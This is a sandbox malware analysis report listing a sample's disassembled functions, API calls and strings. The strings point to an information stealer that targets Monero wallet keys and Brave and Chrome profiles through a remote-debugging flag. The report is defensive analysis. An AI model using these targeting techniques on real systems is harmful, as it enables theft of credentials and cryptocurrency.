                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 7c0afb699d2fe5a00441ea439e9f43ea66ee140349f98d835567a7d9c6b30fe1
                                      • Instruction ID: 942069800f66c26700c80d2611bc3d7ccb5997319238a7a57a9b0eda0e868707
                                      • Opcode Fuzzy Hash: 7c0afb699d2fe5a00441ea439e9f43ea66ee140349f98d835567a7d9c6b30fe1
                                      • Instruction Fuzzy Hash: 1AF0E2B1641308BBE7149BA4AC59FAEB798E705B05F300449F500E7380D6719E00CAA4
                                      Function 00AC1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AD7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7AA0
                                        • Part of subcall function 00AD7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7AA7
                                        • Part of subcall function 00AD7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00AD7ABF
                                        • Part of subcall function 00AD79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AC11B7), ref: 00AD7A10
                                        • Part of subcall function 00AD79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD7A17
                                        • Part of subcall function 00AD79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AD7A2F
                                      • ExitProcess.KERNEL32 ref: 00AC11C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: e308381b551218a60767898aa9b6f9e3fdbaf33d82d74dee706f87166ef7fc0d
                                      • Instruction ID: 251aeed38066030c62a40f759baa3f4b31e2bd7aa604d9b139317667956c5fcc
                                      • Opcode Fuzzy Hash: e308381b551218a60767898aa9b6f9e3fdbaf33d82d74dee706f87166ef7fc0d
                                      • Instruction Fuzzy Hash: 02E012A6A1430153CA1477B47E17F2F329C5B1534AF44041BF90AD2313FD29E8414275

                                      Non-executed Functions

                                      Function 00ACBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00AE0B32,00AE0B2F,00000000,?,?,?,00AE1450,00AE0B2E), ref: 00ACBEC5
                                      • StrCmpCA.SHLWAPI(?,00AE1454), ref: 00ACBF33
                                      • StrCmpCA.SHLWAPI(?,00AE1458), ref: 00ACBF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACC8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00ACC8BB
                                      Strings
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00ACC495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00ACC3B2
                                      • \Brave\Preferences, xrefs: 00ACC1C1
                                      • Preferences, xrefs: 00ACC104
                                      • Brave, xrefs: 00ACC0E8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00ACC534
                                      • Google Chrome, xrefs: 00ACC6F8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: 6701cee47ad1ba9799d0452931eba842b84dfc54712d10c791ba1b6f06a8117e
                                      • Instruction ID: 060b1a54a0eef43906d518680bf612f1b160e7695e72d16b273c5da0383032d9
                                      • Opcode Fuzzy Hash: 6701cee47ad1ba9799d0452931eba842b84dfc54712d10c791ba1b6f06a8117e
                                      • Instruction Fuzzy Hash: 0C5243725101189BCB14FB60DE96FEE733DAF64300F40459AB54BA6291EE30AF49CF66
                                      Function 00AD3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00AD3B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD3B33
                                      • lstrcat.KERNEL32(?,?), ref: 00AD3B85
                                      • StrCmpCA.SHLWAPI(?,00AE0F58), ref: 00AD3B97
                                      • StrCmpCA.SHLWAPI(?,00AE0F5C), ref: 00AD3BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD3EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00AD3ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: 1973f464abc272b756c264912270a97bbe2a70bd6efae83f8ba2e483904abcd1
                                      • Instruction ID: 1bcfdbf936bb4d1e46a8aefb35cb247cb7bb3551634d56c807e9cb3349f1f7a4
                                      • Opcode Fuzzy Hash: 1973f464abc272b756c264912270a97bbe2a70bd6efae83f8ba2e483904abcd1
                                      • Instruction Fuzzy Hash: A4A12072A10318ABDF24DF64DD85FEE7379BB44700F04458AB60E96291EB719B84CF62
                                      Function 00AD4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00AD4B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD4B93
                                      • StrCmpCA.SHLWAPI(?,00AE0FC4), ref: 00AD4BC1
                                      • StrCmpCA.SHLWAPI(?,00AE0FC8), ref: 00AD4BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD4DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00AD4DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 6e23d0ba795361c0240a5610a0603170b78c1aa2e478fad630cffd535ed59d4b
                                      • Instruction ID: de9ec60afa4ef70581d8b0759f27a483a37f0137d55affdb5a2744f016931728
                                      • Opcode Fuzzy Hash: 6e23d0ba795361c0240a5610a0603170b78c1aa2e478fad630cffd535ed59d4b
                                      • Instruction Fuzzy Hash: BA614771910218ABCB24EBA0DD45FEA737CBB58700F00458AF64A96251EB71EB84CFA5
                                      Function 00AD47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AD47D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD47D7
                                      • wsprintfA.USER32 ref: 00AD47F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD480D
                                      • StrCmpCA.SHLWAPI(?,00AE0FAC), ref: 00AD483B
                                      • StrCmpCA.SHLWAPI(?,00AE0FB0), ref: 00AD4851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD48DB
                                      • FindClose.KERNEL32(000000FF), ref: 00AD48F0
                                      • lstrcat.KERNEL32(?,0154FBF0), ref: 00AD4915
                                      • lstrcat.KERNEL32(?,0154E088), ref: 00AD4928
                                      • lstrlen.KERNEL32(?), ref: 00AD4935
                                      • lstrlen.KERNEL32(?), ref: 00AD4946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: bc3c14dfefed30ac9cbd463437cfc11af1b97b28224831099d44cb7a95540a8e
                                      • Instruction ID: 5fb705d4a5d115a205a904d25806383469db0c1af5ea9dca4633480f3d698380
                                      • Opcode Fuzzy Hash: bc3c14dfefed30ac9cbd463437cfc11af1b97b28224831099d44cb7a95540a8e
                                      • Instruction Fuzzy Hash: 2A5144B1914318ABCB24EB70DD99FED737CAB58700F40458AB64AD6250EB74DB84CFA1
                                      Function 00AD40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00AD4113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD412A
                                      • StrCmpCA.SHLWAPI(?,00AE0F94), ref: 00AD4158
                                      • StrCmpCA.SHLWAPI(?,00AE0F98), ref: 00AD416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD42BC
                                      • FindClose.KERNEL32(000000FF), ref: 00AD42D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 00c7f92b2ffcf5440bed5b1fad9d7b7922154d7fb969b3e0258a4979651dcea9
                                      • Instruction ID: 36de98be6485252a667917a1c71a88d9ec73a9546aab5bce5a182147397ed7a5
                                      • Opcode Fuzzy Hash: 00c7f92b2ffcf5440bed5b1fad9d7b7922154d7fb969b3e0258a4979651dcea9
                                      • Instruction Fuzzy Hash: F6517AB1914218ABCB24EBB0DD45FEE737CBB58300F40468AB64A96150DB75AB85CF64
                                      Function 00ACEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00ACEE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00ACEE55
                                      • StrCmpCA.SHLWAPI(?,00AE1630), ref: 00ACEEAB
                                      • StrCmpCA.SHLWAPI(?,00AE1634), ref: 00ACEEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACF3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00ACF3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: df0a59e051fce5fe1e601aae9e99b41bcdaeeb4e2e0d8656d75acfe79c92d6e9
                                      • Instruction ID: 3000780be2b631a022bc695b85294d12112b7f0d4be2e83f4ccd0e7e2a270bc9
                                      • Opcode Fuzzy Hash: df0a59e051fce5fe1e601aae9e99b41bcdaeeb4e2e0d8656d75acfe79c92d6e9
                                      • Instruction Fuzzy Hash: 0EE1D2729111189ADB54FB60CE66EEE733DAF64300F4045DBB54B62292EE306F89CF61
                                      Function 00B00098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: e7230df76ce02f4d431e3cc8dbb542d6e6e383e9d339ca3a16d2c484b8144ce9
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: BEE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      Function 00ACF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
